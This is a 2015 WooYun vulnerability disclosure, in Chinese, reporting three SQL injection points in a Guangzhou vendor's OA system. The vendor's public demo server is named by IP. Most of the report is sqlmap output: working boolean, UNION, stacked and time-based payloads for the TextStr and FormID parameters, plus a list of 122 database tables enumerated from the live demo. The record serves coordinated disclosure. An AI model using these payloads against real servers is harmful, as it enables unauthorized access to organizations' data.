当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-095451

漏洞标题:某OA系统多处SQL注入打包

相关厂商:广州名将软件

漏洞作者: 路人甲

提交时间:2015-02-10 15:58

修复时间:2015-05-14 10:06

公开时间:2015-05-14 10:06

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-02-10: 细节已通知厂商并且等待厂商处理中
2015-02-13: 厂商已经确认,细节仅向厂商公开
2015-02-16: 细节向第三方安全合作伙伴开放
2015-04-09: 细节向核心白帽子及相关领域专家公开
2015-04-19: 细节向普通白帽子公开
2015-04-29: 细节向实习白帽子公开
2015-05-14: 细节向公众公开

简要描述:

某OA系统多处SQL注入打包

详细说明:

官方站:http://www.yf1668.com/


1.jpg


官方演示demo:http://112.124.41.23:38888/


2.jpg


第一处:http://112.124.41.23:38888/CRM/CustomInfo.aspx?TextStr=aaa&DropStr=UserName --dbms=mssql


参数:TextStr


3.jpg


4.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: TextStr
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TextStr=aaa%' AND 6935=6935 AND '%'='&DropStr=UserName
Type: UNION query
Title: Generic UNION query (NULL) - 66 columns
Payload: TextStr=aaa%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(111)+CHAR(110)+CHAR(103)+CHAR(113)+CHAR(78)+CHAR(117)+CHAR(82)+CHAR(109)+CHAR(100)+CHAR(108)+CHAR(108)+CHAR(69)+CHAR(98)+CHAR(110)+CHAR(113)+CHAR(114)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &DropStr=UserName
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TextStr=aaa%'; WAITFOR DELAY '0:0:5'--&DropStr=UserName
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TextStr=aaa%' WAITFOR DELAY '0:0:5'--&DropStr=UserName
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current database: 'FGOA'
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: TextStr
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: TextStr=aaa%' AND 6935=6935 AND '%'='&DropStr=UserName
Type: UNION query
Title: Generic UNION query (NULL) - 66 columns
Payload: TextStr=aaa%' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CHAR(113)+CHAR(111)+CHAR(110)+CHAR(103)+CHAR(113)+CHAR(78)+CHAR(117)+CHAR(82)+CHAR(109)+CHAR(100)+CHAR(108)+CHAR(108)+CHAR(69)+CHAR(98)+CHAR(110)+CHAR(113)+CHAR(114)+CHAR(106)+CHAR(106)+CHAR(113),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL-- &DropStr=UserName
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: TextStr=aaa%'; WAITFOR DELAY '0:0:5'--&DropStr=UserName
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: TextStr=aaa%' WAITFOR DELAY '0:0:5'--&DropStr=UserName
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
Database: FGOA
[122 tables]
+---------------------+
| ERPAnPai |
| ERPBBSBanKuai |
| ERPBBSTieZi |
| ERPBaoJia |
| ERPBaoXiao |
| ERPBookJieHuan |
| ERPBookJieHuan |
| ERPBuMen |
| ERPBuyChanPin |
| ERPBuyOrder |
| ERPCYDIC |
| ERPCarBaoXian |
| ERPCarBaoYang |
| ERPCarInfo |
| ERPCarJiaYou |
| ERPCarLog |
| ERPCarShiYong |
| ERPCarWeiHu |
| ERPCarWeiZhang |
| ERPContractChanPin |
| ERPContractChanPin |
| ERPCrmSetting |
| ERPCustomFuWu |
| ERPCustomHuiFang |
| ERPCustomInfo |
| ERPCustomNeed |
| ERPDanWeiInfo |
| ERPDangAn |
| ERPFileList |
| ERPGongGao |
| ERPGuDingJiLu |
| ERPGuDingJiLu |
| ERPHuiBao |
| ERPHuiYuan |
| ERPJSDIC |
| ERPJXDetails |
| ERPJiXiaoCanShu |
| ERPJiXiaoCanShu |
| ERPJianLi |
| ERPJiangCheng |
| ERPJiangChengZhiDu |
| ERPJiaoSe |
| ERPJinDu |
| ERPJuanKu |
| ERPKaoQin |
| ERPKaoQinSetting |
| ERPLanEmail |
| ERPLiRun |
| ERPLinkLog |
| ERPLinkMan |
| ERPMeeting |
| ERPMianShi |
| ERPMobile |
| ERPNForm |
| ERPNFormType |
| ERPNWorkDetails |
| ERPNWorkFlowBQ |
| ERPNWorkFlowBQ |
| ERPNWorkFlowNode |
| ERPNWorkFlowWT |
| ERPNWorkToDo |
| ERPNetEmail |
| ERPOffice |
| ERPPeiXun |
| ERPPeiXunRiJi |
| ERPPeiXunXiaoGuo |
| ERPPinShen |
| ERPProduct |
| ERPProject |
| ERPRedHead |
| ERPRenShiHeTong |
| ERPReport |
| ERPReportType |
| ERPRiZhi |
| ERPSaveFileName |
| ERPSerils |
| ERPSheBei |
| ERPShenPi |
| ERPShiShi |
| ERPShouKuan |
| ERPSongYang |
| ERPSupplyLink |
| ERPSupplys |
| ERPSystemSetting |
| ERPTalkInfo |
| ERPTalkOnlineUser |
| ERPTalkSetting |
| ERPTaskFP |
| ERPTelFile |
| ERPTiKuKaoShiJieGuo |
| ERPTiKuKaoShiJieGuo |
| ERPTiKuKaoShiJieGuo |
| ERPTiKuShiJuan |
| ERPTiKuShiJuanSet |
| ERPTiKuShiJuanType |
| ERPTiKuType |
| ERPTongXunLu |
| ERPTouSu |
| ERPTreeList |
| ERPUserDesk |
| ERPUserDesk |
| ERPVote |
| ERPWorkPlan |
| ERPWorkRiZhi |
| ERPXCDetails |
| ERPXinChouCanShu |
| ERPXinChouCanShu |
| ERPXueXi |
| ERPXueXiXinDe |
| ERPYinZhangLog |
| ERPYinZhangLog |
| FGOA_FxzlHit |
| FGOA_FxzlHit |
| FGOA_FxzlType |
| FGOA_NetDisk |
| FGOA_PlugIn |
| View_1 |
| dtproperties |
| fgoa_mobile_msg |
| sqlmapoutput |
| sysconstraints |
| syssegments |
+---------------------+

第二处:http://112.124.41.23:38888/NWorkFlow/NWorkToDoAdd.aspx?FormID=65&WorkFlowID=60 --dbms=mssql


参数:FormID


5.jpg


6.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FormID
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: FormID=65 AND 6707=6707&WorkFlowID=60
Type: UNION query
Title: Generic UNION query (NULL) - 1 column
Payload: FormID=-6503 UNION ALL SELECT CHAR(113)+CHAR(114)+CHAR(100)+CHAR(122)+CHAR(113)+CHAR(69)+CHAR(121)+CHAR(76)+CHAR(78)+CHAR(71)+CHAR(78)+CHAR(100)+CHAR(81)+CHAR(109)+CHAR(113)+CHAR(113)+CHAR(114)+CHAR(111)+CHAR(109)+CHAR(113)-- &WorkFlowID=60
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current database: 'FGOA'

第三处:http://112.124.41.23:38888/NWorkFlow/NWorkFlow.aspx?FormID=0 --dbms=mssql


参数:FormID


7.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: FormID
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: FormID=0; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: FormID=0 WAITFOR DELAY '0:0:5'--
---
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2000
current database: 'FGOA'

漏洞证明:

RS

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:11

确认时间:2015-02-13 10:05

厂商回复:

CNVD确认所述漏洞情况,暂未建立与软件生产厂商的直接处置渠道,待认领。

最新状态:

暂无